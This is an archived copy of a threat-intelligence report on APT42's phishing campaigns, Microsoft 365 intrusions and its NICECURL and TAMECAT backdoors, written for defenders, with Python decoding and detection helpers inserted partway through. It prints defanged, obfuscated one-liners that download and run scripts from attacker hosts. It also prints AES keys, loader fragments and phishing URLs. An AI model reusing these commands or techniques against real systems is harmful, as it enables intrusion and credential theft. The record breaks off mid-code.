{
	"id": "456bfe5b-8435-428e-a1b3-d241873d1070",
	"created_at": "2026-04-06T00:16:27.176007Z",
	"updated_at": "2026-04-10T03:34:00.384327Z",
	"deleted_at": null,
	"sha1_hash": "e2b253b023aae7abc86c8ea77b5d6bc2b8b82d35",
	"title": "Uncharmed: Untangling Iran's APT42 Operations",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 4599988,
	"plain_text": "Uncharmed: Untangling Iran's APT42 Operations\r\nBy Mandiant\r\nPublished: 2024-05-01 · Archived: 2026-04-05 15:26:35 UTC\r\nWritten by: Ofir Rozmann, Asli Koksal, Adrian Hernandez, Sarah Bock, Jonathan Leathery\r\nAPT42, an Iranian state-sponsored cyber espionage actor, is using enhanced social engineering schemes to gain\r\naccess to victim networks, including cloud environments. The actor is targeting Western and Middle Eastern\r\nNGOs, media organizations, academia, legal services and activists. Mandiant assesses APT42 operates on behalf\r\nof the Islamic Revolutionary Guard Corps Intelligence Organization (IRGC-IO).\r\nAPT42 was observed posing as journalists and event organizers to build trust with their victims through ongoing\r\ncorrespondence, and to deliver invitations to conferences or legitimate documents. These social engineering\r\nschemes enabled APT42 to harvest credentials and use them to gain initial access to cloud environments.\r\nSubsequently, the threat actor covertly exfiltrated data of strategic interest to Iran, while relying on built-in\r\nfeatures and open-source tools to avoid detection.\r\nIn addition to cloud operations, we also outline recent malware-based APT42 operations using two custom\r\nbackdoors: NICECURL and TAMECAT. 
These backdoors are delivered via spear phishing, providing the\r\nattackers with initial access that might be used as a command execution interface or as a jumping point to deploy\r\nadditional malware.\r\nAPT42 targeting and missions are consistent with its assessed affiliation with the IRGC-IO, which is a part of the\r\nIranian intelligence apparatus that is responsible for monitoring and preventing foreign threats to the Islamic\r\nRepublic and domestic unrest.\r\nAPT42 activities overlap with the publicly reported actors CALANQUE (Google Threat Analysis Group),\r\nCharming Kitten (ClearSky and CERTFA), Mint Sandstorm/Phosphorus (Microsoft), TA453 (Proofpoint), Yellow\r\nGaruda (PwC), and ITG18 (IBM X-Force).\r\nFigure 1: APT42 operations\r\nFake News, Real Credentials: Harvesting Microsoft, Yahoo, and Google\r\nCredentials\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/untangling-iran-apt42-operations\r\nPage 1 of 37\n\nAPT42 is known for its extensive credential harvesting operations that are often accompanied by tailored spear-phishing campaigns and extensive social engineering. APT42 credential harvesting operations typically include\r\nthree steps, described in Figure 2.\r\nFigure 2: APT42 credential harvesting campaign attack lifecycle\r\nMandiant identified at least three clusters of infrastructure used by APT42 to harvest credentials from targets in\r\nthe policy and government sectors, media organizations and journalists, and NGOs and activists. 
The three\r\nclusters employ similar tactics, techniques and procedures (TTPs) to target victim credentials (spear-phishing\r\nemails), but use slightly varied domains, masquerading patterns, decoys, and themes.\r\nA full list of the infrastructure is available in the Indicators of Compromise (IOCs) section.\r\nCluster A: Posing as News Outlets and NGOs\r\nActive: 2021 – today\r\nSuspected Targeting: credentials of journalists, researchers, and geopolitical entities in regions of interest\r\nto Iran. \r\nMasquerading as: The Washington Post (U.S.), The Economist (UK), The Jerusalem Post (IL), Khaleej\r\nTimes (UAE), Azadliq (Azerbaijan), and more news outlets and NGOs. This often involves the use of\r\ntyposquatted domains like washinqtonpost[.]press (a q in place of the g).\r\nMandiant did not observe APT42 target or compromise these organizations, but rather impersonate them.\r\nAttack vector: Malicious links from typosquatted domains that are masquerading as news articles, likely\r\nsent via spear phishing, redirecting the user to fake Google login pages.\r\nFigure 3: Jerusalem Post journalist warns of spear-phishing emails sent on her behalf\r\nCluster B: Posing as Legitimate Services\r\nActive: 2019 – today\r\nTargeting: individuals perceived as a threat to the Iranian regime, including researchers, journalists, NGO\r\nleaders, and human rights activists.\r\nMasquerading as: generic login pages, file hosting services, and YouTube. The domains use TLDs like\r\n.top, .online, .site and .live, and often contain several words separated by hyphens, like panel-live-check[.]online.\r\nAttack vector: legitimate links sent via spear phishing, posing as invitations to conferences or legitimate\r\ndocuments hosted on cloud infrastructure. 
Upon entry, the user is prompted to enter their credentials, which\r\nare sent to the attackers.\r\nMandiant observed several instances of APT42 using Cluster B domains to harvest credentials and host decoy\r\nfiles:\r\nIn March 2023, APT42 deployed the domain ksview[.]top in an attempt to redirect to honest-halcyon-fresher[.]buzz, which hosts a fake Gmail login page targeting a freelance journalist, indicating these\r\ncampaigns are highly tailored to their targets.\r\nFigure 4: Fake Gmail login page used by APT42\r\nIn March 2023, APT42 sent a spear-phishing email with a fake Google Meet invitation, allegedly sent on\r\nbehalf of Mona Louri, a likely fake persona leveraged by APT42, claiming to be a human rights activist\r\nand researcher. Upon entry, the user was presented with a fake Google Meet page and asked to enter their\r\ncredentials, which were subsequently sent to the attackers.\r\nFigure 5: Twitter account of Mona Louri, a likely fake persona leveraged by APT42\r\nThe fake page was hosted on the Google Sites (sites[.]google[.]com) webpage creation tool to enhance its\r\nlegitimacy, and had a reference to a dedicated APT42 domain embedded in its HTML contents, as can be\r\nobserved in Figure 6 and Figure 7. 
This activity was also publicly mentioned on Twitter.\r\nFigure 6: Fake Google Meet page deployed by APT42\r\nFigure 7: APT42 domain embedded in the fake Google Meet page HTML contents\r\nFrom November through December 2023, APT42 targeted the media and non-profit sectors via spear-phishing emails that included a shortened link from the URL shortening service “n9[.]cl,” which redirected\r\nvictims to a likely credential harvesting page mimicking Google Drive using the domain\r\n“review[.]modification-check[.]online,” while other emails included a link to the same domain without the\r\nshortener. The actor additionally shared a benign file via Google Drive as part of this campaign.\r\nIn February 2024, Mandiant observed the APT42 domain nterview[.]site redirecting to the domain admin-stable-right[.]top, which hosted a fake Gmail login page, to target the credentials of a women’s rights\r\nactivist. The domain nterview[.]site was also observed redirecting to a women’s rights-themed lure\r\nallegedly sent by “Jamileh Nedai” (possibly referring to the Iranian filmmaker and women’s rights\r\nactivist).\r\nThe lure, named “Questionnaire.pdf,” is a PDF document hosted on Dropbox with the headline\r\n“Women’s Struggles and Protest.” The document was created by “David Webb,” possibly referring\r\nto the Fox News contributor. We have no indication of this individual being targeted by APT42, but\r\nrather being spoofed by them, possibly to enhance the decoy's legitimacy.\r\nFigure 8: APT42 lure shared via Dropbox (left) containing women’s rights-related content (right)\r\nIn March 2024, APT42 used the domain shortlinkview[.]live, which redirects to panel-view[.]live, in a\r\ncampaign targeting a news editor working in a Persian-language news television channel. 
The final\r\nredirection hosts a fake Gmail login page.\r\nDuring March 2024, APT42 also used the domain reconsider[.]site to redirect users to a decoy document\r\nhosted on Dropbox named “The Secrets of Gaza Tunnels” (titled both in Hebrew and in English), likely\r\nleveraging the Israel-Hamas war.\r\nFigure 9: Decoy document titled “The secrets of Gaza Tunnels” used by APT42\r\nAt the same time, APT42 also used the domain reconsider[.]site to redirect users to last-check-leave[.]buzz\r\nand target Google, Microsoft, and Yahoo credentials. This effort was focused on targeting researchers and\r\nacademic personnel in the U.S., Israel, and Europe.\r\nFigure 10: Fake Yahoo and Hotmail login page used by APT42\r\nIn addition, Mandiant also observed APT42 deploy fake YouTube login pages and URL shortener pages,\r\nlikely disseminated via phishing:\r\nFigure 11: Fake YouTube login page hosted on an APT42 domain\r\nFigure 12: Fake URL shortener page hosted on multiple APT42 domains\r\nCluster C: Posing as “Mailer Daemon,” URL Shortening Services and NGOs\r\nActive: 2022 – today\r\nTargeting: individuals and entities affiliated with various defense, foreign affairs, and academic issues in\r\nthe U.S. 
and Israel.\r\nSpecifically, in November 2023, Mandiant observed this cluster targeting a nuclear physics\r\nprofessor in a major Israeli university, by using the following phishing URL likely masquerading\r\nas a legitimate Microsoft 365 login:\r\nhxxps://email-daemon[.]online/\u003cuniversity_acronym\u003e365[.]onmicrosofl[.]com/accountID=\u003ctarget_handle\u003e\r\nNote that the look-alike tenant name (onmicrosofl[.]com, with an l in place of the t) sits in the URL path; the actual host\r\nis email-daemon[.]online, which is what a URL filter or the user should be judging.\r\nMasquerading as: NGOs, “Mailer Daemon,” and the Bitly URL shortening service.\r\nAttack vector: legitimate links likely sent via spear phishing, posing as invitations to conferences or\r\nlegitimate documents hosted on cloud infrastructure. Upon entry, the user is prompted to enter their\r\ncredentials, which are sent to the attackers.\r\nIn these cases, Mandiant observed APT42 encode targets or lures using “1337” (leet) writing. For example, the\r\nname of Tamir Pardo (the former head of the Israeli Mossad) was represented in the URL\r\nhxxps://bitly[.]org[.]il/t4m1rpa by replacing \"a\" with 4 and \"i\" with 1.\r\nAPT42 likely attempted to use lures related to the International Counter-Intelligence summit (“ICT-2023”)\r\nconducted in Israel, by deploying the following URLs:\r\nhxxps://bitly[.]org[.]il/J03p4y3r\r\nhxxps://youtransfer[.]live/ICT-2023/J03py3r\r\nHead(er) In The Cloud: Targeting Microsoft 365 Environments\r\nAs an extension of their aforementioned credential harvesting operations, during 2022–2023, Mandiant observed\r\nAPT42 exfiltrate documents of interest to Iran and sensitive information from the victims’ public cloud\r\ninfrastructure. These victims were located in the U.S. and the UK in the legal services and NGO sectors. 
However,\r\nsince the initial enabler of these operations lies with credential harvesting, which APT42 conducts worldwide, it is\r\npossible the victimology is much wider.\r\nThese operations began with enhanced social engineering schemes to gain initial access to victim\r\nnetworks, often involving ongoing trust-building correspondence with the victim. Only then were the desired\r\ncredentials acquired and multi-factor authentication (MFA) bypassed: first by serving a cloned website to capture\r\nthe MFA token (which failed) and later by sending MFA push notifications to the victim (which succeeded). \r\nThese techniques have allowed APT42 to covertly access and compromise the victim’s Microsoft 365\r\nenvironment, relying on built-in features and open-source tools to decrease their chances of being detected.\r\nFigure 13: APT42 cloud operations attack lifecycle\r\nThe APT42 cloud operations attack lifecycle can be described in detail as follows:\r\nSocial engineering schemes involving decoys and trust building, which includes masquerading as\r\nlegitimate NGOs and conducting ongoing correspondence with the target, sometimes lasting several\r\nweeks. \r\nThe threat actor masqueraded as well-known international organizations in the legal and NGO fields\r\nand sent emails from domains typosquatting the original NGO domains, for example\r\naspenlnstitute[.]org (a lowercase L in place of the i).\r\nThe Aspen Institute became aware of this spoofed domain and collaborated with industry\r\npartners, including blocking it in Safe Browsing, thus protecting users of Google Chrome and\r\nadditional browsers.\r\nTo increase their credibility, APT42 impersonated high-ranking personnel working at the\r\naforementioned organizations when creating the email personas.\r\nAPT42 enhanced their campaign credibility by using decoy material inviting targets to legitimate\r\nand relevant events and conferences. 
In one instance, the decoy material was hosted on an attacker-controlled SharePoint folder, accessible only after the victim entered their credentials. Mandiant did\r\nnot identify malicious elements in the files, suggesting they were used solely to gain the victim’s\r\ntrust.\r\nFigure 14: APT42-controlled SharePoint folder containing PDF lures\r\nCredential harvesting and bypassing MFA. Only after a certain level of trust was built with the victim,\r\nAPT42 harvested the desired credentials by sending the victim a link that would redirect them to a\r\ncredential harvesting site, similar to the process described in the previously discussed credential theft\r\nsection. \r\nMandiant observed the use of JavaScript files to redirect victims from these links to ultimately serve\r\nfake Microsoft 365 login pages.\r\nAt least once, Mandiant observed APT42 use several methods—both SharePoint login and fake\r\nLinkedIn login pages—to target multiple high-profile personnel of the victim organization during\r\nthe same campaign.\r\nFigure 15: APT42 fake LinkedIn login page\r\nMandiant observed APT42 deploy two methods to bypass MFA: First, APT42 made attempts to\r\nacquire MFA tokens by using fake Duo pages, using subdomains with prefixes such as “api-\r\n\u003cgenerated_id\u003e[.]...” or using words like “duo”. When this failed, the actor sent authentication (push)\r\nprompts to victims by attempting to log in with the harvested credentials, which succeeded. 
In a different intrusion, APT42 likely\r\nserved a phishing site to capture the MFA token sent via SMS and leveraged the KMSI (Keep me signed in) feature to avoid reauthentication.\r\nIn at least one instance, APT42 established a “persistent” login mechanism leveraging the\r\nMicrosoft app password feature, likely in an attempt to preserve ongoing access for future logins\r\nwithout the need to re-verify their identity with MFA.\r\nMicrosoft’s app password feature is intended to be used with applications or devices that do\r\nnot support MFA, and therefore generates separate, long-lived passwords that are accepted without an MFA\r\nchallenge. The feature is not enabled by default, and can be activated manually. Once this feature is enabled,\r\nany logged-in user can create app passwords, so a single phished session is enough to mint one.\r\nAPT42 leveraged the fact that the app password feature was enabled to create an app\r\npassword for the compromised account. However, Mandiant has no indication that APT42\r\nactually used it.\r\nFigure 16: Microsoft app password settings, exploited by APT42 for continuous MFA bypass\r\nCovert exfiltration of data from the Microsoft 365 environment, including OneDrive documents,\r\nOutlook emails, and documents of potential interest to Iran, including files pertaining to its foreign affairs or\r\nthe Persian Gulf region. The M365 infiltration and data exfiltration included the following stages:\r\nLogging in to the victim’s email using the Thunderbird email client, whose use the attacker enabled by\r\naltering the user’s permissions.\r\nLogging into the victim’s Citrix application and using Windows Remote Desktop Protocol (RDP).\r\nUpon entry, the attackers explored, enumerated, and staged files for exfiltration in password-protected 7-Zip archives.\r\nThe attacker performed host, network, and directory reconnaissance using Windows native\r\ncommands including:\r\n\"whoami,\" \"net view,\" \"cd,\" \"explorer,\" 
\"net share,\" \"hostname,\" \"ls,\" \"type,\" \"ping,\" \"net\r\nuser,\" \"gci,\" \"mkdir,\" \"notepad,\" \"mv,\" \"exit,\" \"rm,\" \"dir,\" and \"del.\" (Several of these, such as ls, gci, mv and rm,\r\nare PowerShell aliases rather than cmd.exe commands, consistent with the PowerShell activity described next.)\r\nThe attacker used PowerShell cmdlets including \"Set-ExecutionPolicy,\" \"Import-Module,\"\r\nand \"Invoke-HuntSMBShares,\" a cmdlet from the open-source tooling module\r\nPowerHuntShares that can identify users with excessive network share permissions.\r\nSearching for specific files and data of interest to Iran. For example, in one of the intrusions,\r\nAPT42 searched for specific Iran-related documents with details about foreign affairs issues, as was\r\nobserved in data collected from the Windows Registry key\r\nHKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\TypedPaths (the paths the user typed into the Explorer address bar).\r\nIn another intrusion, Mandiant observed APT42 browsing for files related to the Middle East as well\r\nas the Ukraine war.\r\nFigure 17: APT42 cloud operations flow of attack\r\nAPT42 deployed multiple defense evasion techniques to minimize their intrusion footprint:\r\nRelying on built-in features of the Microsoft 365 environment and publicly available tools. This serves\r\ntwo purposes: it hardens attribution based on tooling and it blends in with the environment, while also\r\nshowing an increase in adaptability.\r\nClearing Google Chrome browser history after reviewing documents of interest.\r\nAttempting (and possibly succeeding) to exfiltrate files to a OneDrive account masquerading as the\r\nvictim’s organization, using the fake email address \u003cvictim_org_name\u003e@outlook[.]com. APT42 also\r\nbrowsed and downloaded files from the victim’s OneDrive to disk, likely to access files of interest. \r\nUsing anonymized infrastructure to interact with the victim’s environment, including ExpressVPN\r\nnodes, Cloudflare-hosted domains, and ephemeral VPS servers. 
\r\nDespite the previously listed defense evasion techniques, Mandiant was able to attribute the cloud operations to\r\nAPT42 based on the usage of domains overlapping with APT42 credential harvesting operations and the very\r\nspecific Iran-related nature of intelligence collected by the actor. \r\nAPT42 Malware-Based Operations\r\nMandiant tracks several APT42 campaigns using custom malware. Most recently, Mandiant observed APT42\r\ndeploy two custom backdoors, TAMECAT and NICECURL. Both of these backdoors were delivered with decoy\r\ncontent (likely via spear phishing) and provide APT42 operators with initial access to the targets. The backdoors\r\nprovide a flexible code-execution interface that may be used as a jumping point to deploy additional malware or to\r\nmanually execute commands on the device.\r\nMandiant estimates APT42 used these backdoors to target NGOs, government, or intergovernmental organizations\r\naround the world, handling issues related to Iran and the Middle East, consistent with APT42's targeting profile.\r\nMalware Family | Description\r\nNICECURL | A backdoor written in VBScript that can download additional modules to be executed, including data mining and arbitrary command execution\r\nTAMECAT | A PowerShell toehold that can execute arbitrary PowerShell or C# content\r\nTable 1: APT42 Malware Families\r\nNICECURL\r\nNICECURL is a backdoor written in VBScript that can download additional modules to be executed, including a\r\ndata mining module, and it provides an arbitrary command execution interface. The backdoor’s accepted\r\ncommands include \"kill\" to remove artifacts and end execution, \"SetNewConfig\" to set a new sleep value, and\r\n\"Module\" to download and execute additional files, potentially extending NICECURL's functionality. 
NICECURL\r\ncommunicates over HTTPS.\r\nIn January 2024, Mandiant observed a malicious LNK file downloading NICECURL and a PDF decoy that\r\nmasqueraded as an Interview Feedback Form of the Harvard T.H. Chan School of Public Health (Figure 18). The\r\ndecoy mentions an interviewee by the name of Daniel Serwer, possibly referring to the scholar and foreign policy\r\nresearcher by the same name, affiliated with the Middle East Institute. It is noteworthy that Mandiant has no\r\nindication these entities were targeted or compromised, but merely spoofed by APT42 decoys.\r\nThe LNK file onedrive-form.pdf.lnk (MD5: d5a05212f5931d50bb024567a2873642) is downloaded from\r\nhxxps://drive-file-share[.]site/OneDrive-Form.pdf.lnk. This file was uploaded to the C2 on January 14, 2024.\r\nFigure 19: NICECURL LNK file hosted on drive-file-share[.]site\r\nThe LNK file contains the following command to download and execute NICECURL from prism-west-candy[.]glitch[.]me (the original command is defanged):\r\ncmd.exe /c set c=cu7rl --s7sl-no-rev7oke -s -d \\\"id=CgYEFk\u0026Prog=2_Mal_vbs.txt\u0026WH=Form.pdf\\\" -X PO7ST\r\nhxxps://prism-west-candy[.]glitch[.]me/Down -o %temp%\\\\down.v7bs\r\n\u0026 call %c:7=% \u0026 set b=sta7rt \\\"\\\" \\\"%temp%\\\\down.v7bs\\\" \u0026 call %b:7=%\r\nThe digit 7 is junk inserted into every sensitive token; cmd.exe's %c:7=% and %b:7=% expansions strip it at run time\r\nbefore each call, so the strings curl, --ssl-no-revoke, POST and start never appear literally in the LNK and are\r\ninvisible to a plain string match on the file.\r\nIn February 2024, Mandiant identified another NICECURL sample named kuzen.vbs (MD5:\r\n347b273df245f5e1fcbef32f5b836f1d), which connects to worried-eastern-salto[.]glitch[.]me and downloads a\r\ndecoy file, question-Em.pdf (MD5: 2f6bf8586ed0a87ef3d156124de32757), about Empowering Women for Peace\r\nfrom an American think tank specializing in U.S. 
foreign policy and international relations (Figure 20).\r\nFigure 20: Decoy file question-Em.pdf (MD5: 2f6bf8586ed0a87ef3d156124de32757)\r\nAccording to the contents of the decoy file, the attack possibly happened in January or the beginning of February\r\n2024 and targeted a victim located in Australia.\r\nMandiant also observed a similarly named encrypted RAR file named “question_Empowering Women for Peace\r\nGender Equality in Conflict Prevention and Resolution (6).rar” (MD5: 13aa118181ac6a202f0a64c0c7a61ce7).\r\nThis RAR file shares the same name with the decoy PDF and likely targeted the same victim. \r\nThis infection chain was previously documented by Volexity.\r\nTAMECAT \r\nIn March 2024, Mandiant identified a sample of TAMECAT, a PowerShell toehold that can execute arbitrary\r\nPowerShell or C# content. TAMECAT is dropped by malicious macro documents, communicates with its\r\ncommand-and-control (C2) node via HTTP, and expects data from the C2 to be Base64 encoded. Mandiant\r\npreviously observed TAMECAT used in a large-scale APT42 spear-phishing campaign targeting individuals or\r\nentities employed by or affiliated with NGOs, government, or intergovernmental organizations around the world.\r\nTAMECAT Execution\r\nExecution begins with a small VBScript downloader that leverages Windows Management Instrumentation\r\n(WMI) to query anti-virus products running on the victim's system. 
Depending on whether the script finds\r\nWindows Defender running, differing download commands and URLs are used.\r\nIf Windows Defender is running, the script will leverage conhost to execute a PowerShell command that uses\r\nwget (the built-in PowerShell alias for Invoke-WebRequest, not the GNU tool) to download content at the following URL: hxxps://s3[.]tebi[.]io/icestorage/config/nconf.txt.\r\nFor all other cases, the script uses cmd.exe to execute a curl command that is similar to the curl command used in\r\nthe NICECURL execution chain previously described, this time with the digit 9 as the junk character:\r\ncmd.exe /c set c=cu9rl --s9sl-no-rev9oke -s -d \"\"i1=aaaa\u0026EF1=2m.txt\u0026WF1=test.pdf\"\" -X PO9ST\r\nhxxp://tnt200[.]mywire[.]org/Do1 -o %temp%\\2m.v9bs \u0026 call %c:9=% \u0026 set b=sta9rt \"\"\"\" \"\"%temp%\\2m.v9bs\"\"\r\n\u0026 call %b:9=%\r\na2.vbs (MD5: d7bf138d1aa2b70d6204a2f3c3bc72a7)\r\nDownloads: hxxps://s3[.]tebi[.]io/icestorage/config/nconf.txt (MD5:\r\n081419a484bbf99f278ce636d445b9d8)\r\nTAMECAT loader\r\nDownloads: hxxp://tnt200[.]mywire[.]org/Do1\r\nContent not available\r\nPossibly downloads malware from NICECURL ecosystem\r\nFigure 21: a2.vbs content\r\nThe downloaded script, nconf.txt (MD5: 081419a484bbf99f278ce636d445b9d8), is a PowerShell script that\r\ncontains an obfuscated and AES-encrypted TAMECAT backdoor. The script also downloads an additional\r\nPowerShell script that is used to AES decrypt the embedded TAMECAT backdoor.\r\nWhen downloading the AES decryption script, the following hard-coded User-Agent string is used:\r\nMozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)\r\nChrome/119.0.0.0 Safari/537.36\r\nIt is noteworthy that the script contains a unique TAMECAT key value T2r0y1M1e1n1o0w1 that was used in a\r\npreviously reported TAMECAT sample observed in June 2023 (MD5: dd2653a2543fa44eaeeff3ca82fe3513),\r\nfurther indicating the two samples belong to the same malware family. 
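Both one-liners quoted in this post (the NICECURL LNK command and the a2.vbs command above) hide curl, --ssl-no-revoke, POST and start behind a junk digit that cmd.exe strips at run time through its %var:old=new% substitution syntax, so the literal tool names never appear in the script. The following Python is an added example written for this page, not code from the Mandiant post or from the malware: it recovers the real commands by replaying the assignment and substitution, and flags command lines whose substituted output reveals a download or launch tool that the raw text does not contain. The two sample command lines are reconstructed from the defanged ones in the post with their cmd quoting removed, and are labelled as constructed in the code.

```python
import re

# `set NAME=VALUE` assignments; the value runs until the next ' & ' separator.
# Quoting is not modelled: the constructed samples below carry no quotes.
SET_RE = re.compile(r'(?:^| )set ([A-Za-z_][A-Za-z0-9_]*)=(.*?)(?= & |$)')
# `%NAME:OLD=NEW%` expansions: cmd.exe replaces every OLD in NAME with NEW
# (NEW may be empty, as in %c:7=%). Real cmd.exe matches OLD case-insensitively;
# this simplified replay is case-sensitive, which is enough for digit junk.
SUBST_RE = re.compile(r'%([A-Za-z_][A-Za-z0-9_]*):([^=%]+)=([^%]*)%')

# Download/launch tools that matter when they only appear after substitution.
REVEAL_TOKENS = {'curl', 'start', 'powershell', 'mshta', 'wscript',
                 'cscript', 'certutil', 'bitsadmin', 'rundll32'}


def recover_commands(cmdline):
    # Replay the assignments, then expand each %var:old=new% the way the
    # later `call` would, returning the commands that actually execute.
    assigned = dict(SET_RE.findall(cmdline))
    recovered = []
    for name, old, new in SUBST_RE.findall(cmdline):
        if name in assigned:
            recovered.append(assigned[name].replace(old, new))
    return recovered


def revealed_tools(cmdline):
    # Tool names that are absent from the raw command line as whole words
    # but present as the first token of a recovered command.
    raw = cmdline.lower()
    found = set()
    for cmd in recover_commands(cmdline):
        parts = cmd.split()
        if not parts:
            continue
        tool = parts[0].lower().rsplit('.', 1)[0]
        if tool in REVEAL_TOKENS and not re.search('(?<![a-z])' + tool + '(?![a-z])', raw):
            found.add(tool)
    return found


# Constructed samples modelled on the two defanged one-liners in the post,
# with their cmd quoting removed; URLs stay defanged (hxxp, [.]).
SAMPLE_NICECURL_LNK = (
    'cmd.exe /c set c=cu7rl --s7sl-no-rev7oke -s -d id=CgYEFk&Prog=2_Mal_vbs.txt&WH=Form.pdf '
    '-X PO7ST hxxps://prism-west-candy[.]glitch[.]me/Down -o %temp%\\down.v7bs'
    ' & call %c:7=% & set b=sta7rt %temp%\\down.v7bs & call %b:7=%'
)
SAMPLE_TAMECAT_A2 = (
    'cmd.exe /c set c=cu9rl --s9sl-no-rev9oke -s -d i1=aaaa&EF1=2m.txt&WF1=test.pdf '
    '-X PO9ST hxxp://tnt200[.]mywire[.]org/Do1 -o %temp%\\2m.v9bs'
    ' & call %c:9=% & set b=sta9rt %temp%\\2m.v9bs & call %b:9=%'
)

if __name__ == '__main__':
    for sample in (SAMPLE_NICECURL_LNK, SAMPLE_TAMECAT_A2):
        for cmd in recover_commands(sample):
            print(cmd)
        print('revealed:', sorted(revealed_tools(sample)))
```

Because the junk character is read from the substitution itself rather than hard-coded, the same replay handles the 7 used in the LNK and the 9 used in a2.vbs; a process-creation or LNK-scanning rule that runs revealed_tools over the command line catches both without a per-sample signature.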
However, the unique value is not used in\r\nthe script.\r\nThe script stores the URL for the AES decryption script as a Base64 string where the first three characters are\r\ntruncated and the remaining string is Base64 decoded: \r\npepaHR0cHM6Ly9zMy50ZWJpLmlvL2ljZXN0b3JhZ2UvZGYzMnMudHh0\r\nDecodes to: hxxps://s3[.]tebi[.]io/icestorage/df32s.txt\r\nThe script stored at this URL is df32s.txt (MD5: c3b9191f3a3c139ae886c0840709865e)\r\nThe response content is Base64 decoded and also further decoded using a routine that does the following:\r\nInverts the bits of each byte within an array named $bytesOfRes\r\nExtracts the least significant byte (8 bits) from the inverted representation\r\nConverts the extracted byte back into a numerical byte value\r\nThe net effect is that each byte b becomes (~b) & 0xFF, a transform that is its own inverse.\r\nOnce decoded, the resulting PowerShell function resembles the following:\r\nFigure 22: Decoded df32s.txt\r\nThe decoded script is a function that is mainly used to AES decrypt parameters that are passed to it. In addition, it\r\ndefines global variables including a C2 domain, which are used by the TAMECAT backdoor that gets decrypted\r\nand executed.\r\nThe following AES key and IV are used to decrypt content (the key is 32 bytes, i.e. AES-256, and the IV is one 16-byte\r\nAES block):\r\nAES Key: kNz0CXiP0wEQnhZXYbvraigXvRVYHk1B\r\nAES IV: 0T9r1y1M2e0N0o1w\r\nThe parent script uses the AES decrypt function to Base64-decode and AES-decrypt the following string that is\r\ncontained in the parent script:\r\nv+UDXK47mBGgYqTbOXjXVD6MzhZenTfVf6CKxQFp2+AiPHMvmA2a4IiBz4rOi8ffxWdXFtrPk6\r\nUABw1b6oBPsW1VV/HNU0mf8jH7xsoBAHY5Sp6vdYc7WGZ6SYO72KIH/hOyBlS5wc7Y86wJ\r\nR9naW+0nINCYZV6RyD5t/fDpqEoRYW6dHwoebLECkEck/N5C1jhlFHaoS51QKSfgraHI5iRiT6p\r\nfpqUNeJHbYz3VYuo/j2FZ6f5BCJgXoHKPmf4pUSwSZH0qQSa98blmdAH+tG7jc3AUE76IHx4x\r\nkzxAldO/4b97duoI6rm+Ucy3rRHHrVnPQ0TvvTvudD/LDBwn3DkNcKSTDvEQDwIgni/MU7BOw\r\nklcE1+qQjabXTGr+CrL0c53dNA4OGNYkBAnLokjcoNxKmxbCSK3oSdFEz2+htgPMOjq14IGoPS\r\nOWcPX2CVK\r\nOnce decrypted, 
additional PowerShell is revealed that appends together a string obfuscated within nconf.txt, and\r\nAES decrypts the string. The decrypted result is the TAMECAT backdoor.\r\nBorjol($wvp[5]+$xme[2]+$nwk[3]+$vrl[3]+$gzk[4]+$ni2[0]+$tkk[2]+$kq4[0]+$yoe[4]+$jwv[0]+\r\n$ywa[0]+$sxi[5]+$bw9[12]+$kgu[1]+$mdi[0]+$ruz[3]+$byh[3]+$sja[3]+$wqf[0]+$wof[2]+$mg\r\n4[1]+$rfi[5]+$dt9[11]+$qgv[9]+$jt5[0]+$lli[1]+$owd[4]+$lp2[6]+$wkb[2]+$zen[7]+$sro[0]+$ta8\r\n[0]+$kg9[0]+$esk[8]+$ci4[5]+$oyx[0]+$ico[1]+$xy9[1]+$vvl[0])\r\nThe TAMECAT backdoor initially writes a likely victim identifier to the following location:\r\n%LOCALAPPDATA%\\config.txt.\r\nThe TAMECAT backdoor makes an initial POST request to the globally defined C2 domain: hxxps://accurate-sprout-porpoise[.]glitch[.]me. \r\nThe initial POST request contains information like the following, which is AES encrypted and Base64 encoded:\r\n{\r\n    \"rwsdjfxsdf\": [\r\n        {\r\n            \"num\": \"1\"\r\n        },\r\n        {\r\n            \"OS\": \"\u003cos_caption\u003e\"\r\n        },\r\n        {\r\n            \"ComputerName\": \"\u003ccomputer_name\u003e\"\r\n        },\r\n        {\r\n            \"Token\": \"\u003cvalue_from_configtxt\u003e\"\r\n        }\r\n    ]\r\n}\r\nThe TAMECAT backdoor AES encrypts the content using the key kNz0CXiP0wEQnhZXYbvraigXvRVYHk1B\r\nand a randomly generated 16-character IV, generated from the string\r\nABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz. The randomly generated IV is added to\r\nthe POST request in a header called Content-DPR. The AES key is not transmitted to the C2, so it is likely the\r\nsame AES key is used for multiple victims. Because the key is hard-coded in the sample and the IV travels in the clear,\r\nanyone holding the key can decrypt captured traffic in both directions. 
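The helpers below are an added example written for this page, not code from the post or from TAMECAT itself. They implement in Python the parts of the TAMECAT stager and C2 wire format described in this section that need no cipher library: stripping the three-character prefix from the Base64 URL string, the bit-inversion decoding applied to df32s.txt, generating and recognising the 16-letter Content-DPR IV, and parsing the ¶-delimited tasking that the next paragraph describes. The AES step itself (32-byte key, so AES-256; the post does not state the mode) is not reproduced, so parse_tasking takes the already-decrypted text. The prefixed Base64 string is the one quoted above; the df32s.txt body and the tasking string are constructed stand-ins and are marked as such in the code.

```python
import base64
import secrets
import string

# IV alphabet quoted in the post: A-Z then a-z, no digits or symbols.
IV_ALPHABET = string.ascii_uppercase + string.ascii_lowercase
IV_LENGTH = 16
LANGUAGES = {'powershell', 'csharp'}
START_STOP = {'downloadutils', 'start', 'stop'}


def defang(url):
    # Print indicators the way the post does: hxxp(s):// and [.] in the host.
    scheme, rest = url.split('://', 1)
    host, _, path = rest.partition('/')
    return 'hxx' + scheme[3:] + '://' + host.replace('.', '[.]') + '/' + path


def decode_prefixed_url(blob, junk=3):
    # nconf.txt keeps the next-stage URL as Base64 with three junk characters
    # prepended; drop them, then decode.
    return base64.b64decode(blob[junk:]).decode('ascii')


def decode_inverted(b64_text):
    # The df32s.txt decoding routine: Base64, then invert every bit of each
    # byte and keep the low 8 bits, i.e. (~b) & 0xFF.
    return bytes((~b) & 0xFF for b in base64.b64decode(b64_text))


def encode_inverted(data):
    # The inverse transform, used here only to build a constructed sample.
    return base64.b64encode(bytes((~b) & 0xFF for b in data)).decode('ascii')


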